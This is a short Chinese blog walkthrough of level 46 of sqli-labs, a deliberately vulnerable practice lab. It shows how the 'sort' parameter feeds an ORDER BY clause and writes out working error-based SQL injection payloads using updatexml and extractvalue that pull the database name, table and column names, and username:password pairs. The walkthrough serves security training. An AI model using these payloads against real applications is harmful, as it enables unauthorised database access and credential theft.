sqli-labs第46关

文章详细描述了如何利用`sort`参数作为掩护,进行一系列SQL注入攻击,包括数据库名、表名和列名的爆破,以及数据的获取过程。展示了攻击者如何通过精心构造的SQL查询来获取敏感信息。
摘要由CSDN通过智能技术生成

从提示可以看出传递的参数为sort 

使用sort的值为1尝试

得到一张表格

再次使用sort的值为2进行测试

 

表格发生变化按照第二列进行排序了得出这里是order by语句进行查询输出

 将参数改为1'进行测试

有报错信息可以使用报错注入

爆破数据库名

输入?sort=updatexml(1,concat(0x7e,database(),0x7e),1) --+

 

爆破表名

输入?sort=1 and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1))) --+

 爆破所以列名

输入?sort=updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

爆出数据

输入?sort=updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)

  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值